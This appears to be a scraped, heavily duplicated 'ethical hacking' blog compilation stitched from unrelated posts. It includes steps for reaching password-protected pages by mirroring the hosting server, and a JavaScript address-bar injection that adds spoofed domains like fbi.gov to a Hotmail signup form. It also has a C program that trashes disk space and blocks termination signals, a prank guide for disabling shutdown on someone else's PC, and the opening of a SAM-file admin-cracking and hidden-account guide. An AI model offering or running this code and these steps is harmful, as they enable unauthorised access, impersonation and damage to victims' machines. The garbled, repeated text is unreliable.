We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.
i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol
here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .
Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.
We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.
Get ur unique msn account
//Not actice now
this thread will be erased in some days
try something new www.deadfake.com annms mail
Popular
* Get your Own Unique msn account @"whateveryouwant"
Get your Own Unique msn account @"whateveryouwant"
There are two ways ..
the first simple one is to go to https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&sl=1&vv=410&lc=1033
and continue registering from here .. this is the easy way ...
Now the ELITE waY
1. Goto http://get.live.com/getlive/overview to start registering your windows live account.
2. Press the sign-up button and you will be presented a form to sign up for a hotmail account.
3.Copy the following javascript injection code:
javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="md5this.");r(a = new Array("hotmail.com","fbi.gov","nasa.gov",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*md5this.com*/,d+"nl")); for (i=0;i
4. Paste the code in your address bar (you know, that thing you normally type www.sainathgupta.tk .
5. Hit enter, if all went well it should show a message box telling you "Success - additional domains added!".
6.Now you can select a multitude of domains, fill out the form and you are ready to go!
Now you have a New msn account to scare your friends out
play with it ... enter a @whatever you want chat with people .. scare them
beyond that
javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="toxic.");r(a = new Array("hotmail.com","csthis.com","nasa.gov","fbi.gov","iknowwhatyoudidlastsummer.info",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*csthis.com*/,d+"nl")); for (i=0;i
and here is more .....
https://account.live.com/MessagePage.aspx?lc=1033&message=SIconfirmed¶m=%69%68%61%63%6B%65%64%40%6E%61%73%61%2E%67%6F%76%0A
//Not actice now
this thread will be erased in some days
try something new www.deadfake.com annms mail
Popular
* Get your Own Unique msn account @"whateveryouwant"
Get your Own Unique msn account @"whateveryouwant"
There are two ways ..
the first simple one is to go to https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&sl=1&vv=410&lc=1033
and continue registering from here .. this is the easy way ...
Now the ELITE waY
1. Goto http://get.live.com/getlive/overview to start registering your windows live account.
2. Press the sign-up button and you will be presented a form to sign up for a hotmail account.
3.Copy the following javascript injection code:
javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="md5this.");r(a = new Array("hotmail.com","fbi.gov","nasa.gov",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*md5this.com*/,d+"nl")); for (i=0;i
4. Paste the code in your address bar (you know, that thing you normally type www.sainathgupta.tk .
5. Hit enter, if all went well it should show a message box telling you "Success - additional domains added!".
6.Now you can select a multitude of domains, fill out the form and you are ready to go!
Now you have a New msn account to scare your friends out
play with it ... enter a @whatever you want chat with people .. scare them
beyond that
javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="toxic.");r(a = new Array("hotmail.com","csthis.com","nasa.gov","fbi.gov","iknowwhatyoudidlastsummer.info",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*csthis.com*/,d+"nl")); for (i=0;i
and here is more .....
https://account.live.com/MessagePage.aspx?lc=1033&message=SIconfirmed¶m=%69%68%61%63%6B%65%64%40%6E%61%73%61%2E%67%6F%76%0A
Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized mannual fr u guys. may help a lot
• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)
• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses
Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus
Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS
Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS
Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks
Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords
• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic
Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP
Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized mannual fr u guys. may help a lot
• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)
• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses
Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus
Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS
Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS
Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks
Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords
• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic
Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP
hmm well i made dis generalized mannual fr u guys. may help a lot
• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)
• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses
Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus
Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS
Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS
Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks
Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords
• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic
Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP
Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized mannual fr u guys. may help a lot
• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)
• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses
Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus
Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS
Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS
Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks
Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords
• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic
Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP
Make Ultra Strong Passwords
A very good One from Irongeek.
Strong Article Worth Sharin
As some Microsoft Operating System geeks know, you can type many more characters than are on a standard keyboard by using the ALT+NUMPAD combination technique. For example, by holding down the ALT key, typing 234 on the number pad, then releasing ALT gives you the O character. I'm writing this article mostly because when I search around for information on the topic of ALT+Number key combos I find pages that are lacking in details. Most of the pages I found are coming from the angle of using ALT+NUMPAD combinations as shortcuts for typing in non-English languages, but I have another use for them. Using ALT+NUMPAD can make for some very ugly passwords to crack. These odd characters have two major advantages over normal keystrokes:
1. They are unlikely to be in someone's dictionary or brute force list. Try brute forcing a password like "ace of ?s" or "I am the a and the O".
2. Some hardware key loggers will not log these odd characters. Your mileage may vary on this as some key loggers can, so don't rely on it to keep you 100% safe.
I'll cover the 2nd point more in an upcoming article. Using ALT+NUMPAD to type odd characters into your password also has a few disadvantages.
1. The way they are described in this article only works in Microsoft Operating Systems (DOS, Windows 9x, Vista, XP, 2000), and there may be some variation amongst the different versions. If you know of a good way to do the same thing in Linux please email me.
2. Not all applications will let you use these odd characters. For testing I tried the password "Oÿ" (ALT+234 and ALT+0255) on a Windows XP local account,, but not all application will let you use these sorts of characters in your password.
Microsoft has the following to say on the subject of ALT+NUM key codes:
From:http://www.microsoft.com/globaldev/reference/glossary.mspx
Alt+Numpad: A method of entering characters by typing in the character’s decimal code with the Numeric Pad keys (Num Lock turned on). In Windows:
• Alt+, where xxx is the decimal value of a code point, generates an OEM-encoded character.
• Alt+<0xxx>, where xxx is the decimal value of a code point, generates a Windows-encoded character.
• Alt+<+>+, where xxxx is the hexadecimal Unicode code point, generates a Unicode-encoded (UTF-16) character.
Shortly I'll explain explain the first two methods further. The 3rd is more problematic to work with. First, you may have to edit your registry and add a the REG_SZ value "HKEY_Current_User/Control Panel/Input Method/EnableHexNumpad", then set it to "1". Also, depending on where you are trying to type the character the application may interpret your hexadecimal Fs as attempts to bring down the file menu. Since method three is so problematic I'll focus on the first two methods.
First, make sure you are using the number pad and not the top roll number keys, only the number pad works for this. Second, make sure NUM LOCK is on. It does not have to be on in all cases for these key combos to work, but it helps by keeping the number pad from being misinterpreted.
The chart from the site shows the relevant key codes to get various symbols. The table on the left shows the OEM Extended ASCII character set (AKA: IBM PC Extended Character Set; Extended ASCII; High ASCII; 437 U.S. English). True ASCII is only 7 bit, so the range is 0 to 127. IBM extended it to 8 bits and added more characters. To type these characters you merely have to hold down an ALT key, type the numeric value of the character, then release the ALT key.
The table on the right shows the ANSI character set (AKA: Window's ANSI/ISO Latin-1/ANSI Extended ASCII, though technically they are not exactly the same thing.). To use the ANSI character set you do the same thing as the OEM set, but you preface the number with an extra zero. Notice that the first 127 should be the same in both sets, though values 0-31 may not be viewable in all cases. I've been in "character encoding hell" just trying to get this article on my site in a readable format.
For example, ALT+257 gives me a in Wordpad, but in Notepad it loops back around the character set and gives me?(257-256=1 which is ? in the OEM set) . If you want to know what key code will bring up a particular character in a certain Windows font run Windows Character Map (charmap.exe) and look in the bottom right corner to find out.
some examples :
ALT+130 é
ALT+131 â
ALT+132 ä
ALT+133 à
ALT+134 å
ALT+135 ç
ALT+136 ê
ALT+137 ë
ALT+138 è
ALT+139 ï
ALT+140 î
ALT+141 ì
ALT+142 Ä
ALT+143 Å
ALT+144 É
ALT+145 æ
ALT+146 Æ
ALT+147 ô
ALT+148 ö
ALT+149 ò
ALT+150 û
ALT+151 ù
ALT+152 ÿ
ALT+153 Ö
ALT+154 Ü
ALT+155 ¢
ALT+156 £
ALT+157 ¥
ALT+158 P
ALT+159 ƒ
ALT+160 á
ALT+161 í
ALT+162 ó
ALT+163 ú
ALT+164 ñ
ALT+165 Ñ
ALT+166 ª
ALT+167 º
ALT+168 ¿
ALT+169 ¬
Create Bad sectors on hard disks
A C source code
/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/
#include
#include
#include
#include
#include
#include
#include
#define HDSIZE 640000
void handle_sig();
int main() {
int i = 0;
int x;
int fd[5];
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
char *buf;
buf = malloc(HDSIZE);
printf("sekt0r: trashing hard disk with bad sectors!\n");
while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);
for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);
} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */
void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}
Disable or remove shutdown
=> remove shutdown from start menu and also from all other possible options.
=> hide shutdown from start menu
=> disable shutdown all togetherDisable or remove shutdown - The Ethical Hackinglearn to do it now!!! (it takes less than a minute to do so) Disclaimer: this is an article which just brings out the fact that removing the
shut down menu option from the start menu is possible. If you however get caught
by your manager or college system administrator, and get whipped in your ass, I
cannot be held responsible. This tool is a inbuilt tool present in windows XP, just like msgconfig. So you
got to execute this command using run. 1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this. Also if
you a minute with your pal’s system and this pal tries to flirt your girl friend
- You can make a lot of changes to his system in the time he leaves you alone
with his system, to have him go bonkers.
2. User configuration -> administrative Templates -> start menu and taskbar -> 3. This option opens up a pane on the right hand side. Identify the option named
- Remove SHUT DOWN on the start menu . 4. Double click Remove SHUT DOWN on the start menu option 5. a small screen pops up and you may like to read about the explanation in the
EXPLAIN TAB before you change the settings. 6. Just change the radio button TO ENABLED and say apply. 7. DONE. No need to log off or restart the system. (You may however have to find
a way to restart your system.) 8. This option disables the log off option from the system. From the start menu,
also from the life saver – three buttons CTRL - ALT - DEL options. This option goes well with the HIDING THE LOG OFF FROM START MENU… (To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager (alt+ctrl+del) or by
pressing winkey+L where u get the option to turn off ur compy/restart/stand
by.
or u may create a shortcut using this shortcut location to shutdown ur sys %windir%\system32\shutdown.exe -s to restart, u can use this shortcut %windir%\system32\shutdown.exe -r
Self distructing Email - MI3
*****
one word - Just perfect
One of the best service i found online n using it too personally..
Big Brother is Watching
Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?
Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.
BigString takes the risk out of email
Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.
BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.
BigString lets you have second thoughts
BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.
You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.
BigString takes the danger out of clicking
BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.
BigString is easy to use
BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!
Here are just a few of the many applications of BigString
Erasable, Recallable, Non-Printable Email.
Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.
On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!
Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!
Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.
Self distructing Email - MI3 - The Ethical Hacking
SAM History n Hacking
1-Introduction
This article introduce very simple way to get Administrator like account and do the job and after finish recover your way, after that Get Admin Password later in your home by Cracking, After get the Admin Password Create a hidden user account and do all your jobs free, and Explain how to make a USB Storage Device Bootable corresponding to any system boot, and how to bypass Mother Board password by Default Passwords, and how to extract it if you are in the system
2-To Hackers / Security Systems Engineers
First All must know that both Hackers / Security Systems Engineers Are 2 faces to the same coin Any way, I try this on Windows XP SP2 I want all to try it on Windows Server 2003, Windows Vista Any Windows NT and POST a Message to make all know what versions exactly this idea can apply for
3-Close Look to hole
Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain critical information about users account you can explore the folder
$windir$\system32\config
You will find all things and may discover some thing new, but what amazing here is that the file is available, so we can apply our idea
shot1
You will Not be able To copy them Under XP
4-Dose Microsoft Know and Why!?
